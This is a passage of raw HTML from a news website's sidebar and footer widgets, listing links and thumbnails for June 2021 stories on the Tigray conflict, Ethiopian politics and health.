									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/alert-situation-in-mekele/" title="Alert: Situation in Mekele"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Mekele" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Great-Seal-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Great-Seal-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Great-Seal-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Great-Seal-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Mekele" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Great-Seal-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Great-Seal-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/alert-situation-in-mekele/" title="Alert: Situation in Mekele">
										Alert: Situation in Mekele									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96638 post type-post status-publish format-standard has-post-thumbnail category-world">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ethiopia-a-statement-by-unicef-said-ethiopian-national-defense-forces/" title="#Ethiopia: A statement by @UNICEF said Ethiopian National Defense Forces"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="UNICEF s" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/uniceflogo-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/uniceflogo-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="UNICEF s" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ethiopia-a-statement-by-unicef-said-ethiopian-national-defense-forces/" title="#Ethiopia: A statement by @UNICEF said Ethiopian National Defense Forces">
										#Ethiopia: A statement by @UNICEF said Ethiopian National Defense Forces									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96634 post type-post status-publish format-standard has-post-thumbnail category-africa">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/rebels-in-tigray-reject-calls-for-ceasefire-after-ethiopian-government-forces-withdraw-from-regional-capital/" title="Rebels in Tigray reject calls for ceasefire after Ethiopian government forces withdraw from regional capital"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Rebels-Tigray" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-57-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-57-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-57-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-57-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Rebels-Tigray" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-57-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-57-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/rebels-in-tigray-reject-calls-for-ceasefire-after-ethiopian-government-forces-withdraw-from-regional-capital/" title="Rebels in Tigray reject calls for ceasefire after Ethiopian government forces withdraw from regional capital">
										Rebels in Tigray reject calls for ceasefire after Ethiopian government forces withdraw from regional capital									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96631 post type-post status-publish format-standard has-post-thumbnail category-world">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/washington-says-it-will-not-stand-by-in-the-face-of-horrors-in-tigray/" title="Washington says it will not &#8216;stand by in the face of horrors&#8217; in Tigray"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Washington" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-59-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-59-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-59-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-59-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Washington" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-59-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-59-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/washington-says-it-will-not-stand-by-in-the-face-of-horrors-in-tigray/" title="Washington says it will not &#8216;stand by in the face of horrors&#8217; in Tigray">
										Washington says it will not &#8216;stand by in the face of horrors&#8217; in Tigray									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96626 post type-post status-publish format-standard has-post-thumbnail category-africa">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ethiopias-choice-dialogue-or-disintegration/" title="Ethiopia’s choice: Dialogue or disintegration"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dialogue" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Dialogue-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Dialogue-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Dialogue-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Dialogue-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dialogue" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Dialogue-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Dialogue-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ethiopias-choice-dialogue-or-disintegration/" title="Ethiopia’s choice: Dialogue or disintegration">
										Ethiopia’s choice: Dialogue or disintegration									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96617 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/tigray-defense-force-says-no-cease-fire-military-and-foreign-affairs-network/" title="Tigray Defense force says no cease fire- Military and Foreign Affairs Network"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray Defense force" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray Defense force" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/tigray-defense-force-says-no-cease-fire-military-and-foreign-affairs-network/" title="Tigray Defense force says no cease fire- Military and Foreign Affairs Network">
										Tigray Defense force says no cease fire- Military and Foreign Affairs Network									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96604 post type-post status-publish format-standard has-post-thumbnail category-world">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/eritrean-forces-withdraw-from-key-towns-in-ethiopias-tigray/" title="Eritrean forces withdraw from key towns in Ethiopia&#8217;s Tigray"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray Defense force" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray Defense force" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/Untitled-58-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/eritrean-forces-withdraw-from-key-towns-in-ethiopias-tigray/" title="Eritrean forces withdraw from key towns in Ethiopia&#8217;s Tigray">
										Eritrean forces withdraw from key towns in Ethiopia&#8217;s Tigray									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96598 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/qeerroon-biyya-keessaa-gootummaan-keessani-kan-haaceen-adda-miti/" title="Qeerroon biyya keessaa gootummaan keessani kan Haaceen adda miti!!"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Qeerroon" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-e1624989646964.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Qeerroon" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-e1624989646964.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap9-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/qeerroon-biyya-keessaa-gootummaan-keessani-kan-haaceen-adda-miti/" title="Qeerroon biyya keessaa gootummaan keessani kan Haaceen adda miti!!">
										Qeerroon biyya keessaa gootummaan keessani kan Haaceen adda miti!!									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96595 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/omn-yaadannoo-haacaaluu-waggaa-1ffaa/" title="OMN: Yaadannoo Haacaaluu Waggaa 1ffaa"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Haacaaluu" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-e1624978619196.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Haacaaluu" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-e1624978619196.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap8-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/omn-yaadannoo-haacaaluu-waggaa-1ffaa/" title="OMN: Yaadannoo Haacaaluu Waggaa 1ffaa">
										OMN: Yaadannoo Haacaaluu Waggaa 1ffaa									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>			</ul></div>	</aside>	</div>
    </div>
<footer class="mh-footer" itemscope="itemscope" itemtype="https://schema.org/WPFooter">
<div class="mh-container mh-container-inner mh-footer-widgets mh-row clearfix">
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-1">
<div id="mh_magazine_custom_posts-16" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/health/" class="mh-widget-title-link">Health</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96133 post type-post status-publish format-standard has-post-thumbnail category-health">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/who-says-an-outbreak-of-human-infections-linked-to-camels-affected-nearly-200-people-in-ethiopia/" title="WHO says an outbreak of human infections linked to camels affected nearly 200 people in Ethiopia"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/204333800_2641386806161244_7872142699094913144_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/who-says-an-outbreak-of-human-infections-linked-to-camels-affected-nearly-200-people-in-ethiopia/" title="WHO says an outbreak of human infections linked to camels affected nearly 200 people in Ethiopia">
										WHO says an outbreak of human infections linked to camels affected nearly 200 people in Ethiopia									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 23, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-95324 post type-post status-publish format-standard has-post-thumbnail category-health">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/sex-education-ignites-online-culture-clash-in-ethiopia/" title="Sex education ignites online culture clash in Ethiopia"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Sex education" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/https___d1e00ek4ebabms.cloudfront.net_production_816b9c8b-6060-469e-8538-2691d249ea87-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/https___d1e00ek4ebabms.cloudfront.net_production_816b9c8b-6060-469e-8538-2691d249ea87-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/https___d1e00ek4ebabms.cloudfront.net_production_816b9c8b-6060-469e-8538-2691d249ea87-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/https___d1e00ek4ebabms.cloudfront.net_production_816b9c8b-6060-469e-8538-2691d249ea87-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Sex education" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/https___d1e00ek4ebabms.cloudfront.net_production_816b9c8b-6060-469e-8538-2691d249ea87-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/https___d1e00ek4ebabms.cloudfront.net_production_816b9c8b-6060-469e-8538-2691d249ea87-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/sex-education-ignites-online-culture-clash-in-ethiopia/" title="Sex education ignites online culture clash in Ethiopia">
										Sex education ignites online culture clash in Ethiopia									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 11, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-92794 post type-post status-publish format-standard has-post-thumbnail category-health">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/russia-ethiopia-set-to-ink-deal-on-sputnik-v-supplies-says-ambassador/" title="Russia, Ethiopia set to ink deal on Sputnik V supplies, says ambassador"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Russia-Ethiopia" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Russia-Ethiopia" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/04/corona-5174671_1920-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/russia-ethiopia-set-to-ink-deal-on-sputnik-v-supplies-says-ambassador/" title="Russia, Ethiopia set to ink deal on Sputnik V supplies, says ambassador">
										Russia, Ethiopia set to ink deal on Sputnik V supplies, says ambassador									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/04/">April 30, 2021</a></span>
</div>
							</div>
						</li>			</ul></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-2">
<div id="mh_magazine_custom_posts-12" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/fun-videos/" class="mh-widget-title-link">Fun Videos</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-93264 post type-post status-publish format-standard has-post-thumbnail category-fun-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ola-defeated-endf-on-three-fronts-and-siezed-many-weapons-claims-by-ola/" title="OLA defeated ENDF on three fronts and Siezed many Weapons claims by OLA"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-e1620406409957.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-e1620406409957.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ola-defeated-endf-on-three-fronts-and-siezed-many-weapons-claims-by-ola/" title="OLA defeated ENDF on three fronts and Siezed many Weapons claims by OLA">
										OLA defeated ENDF on three fronts and Siezed many Weapons claims by OLA									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/05/">May 7, 2021</a></span>
</div>
							</div>
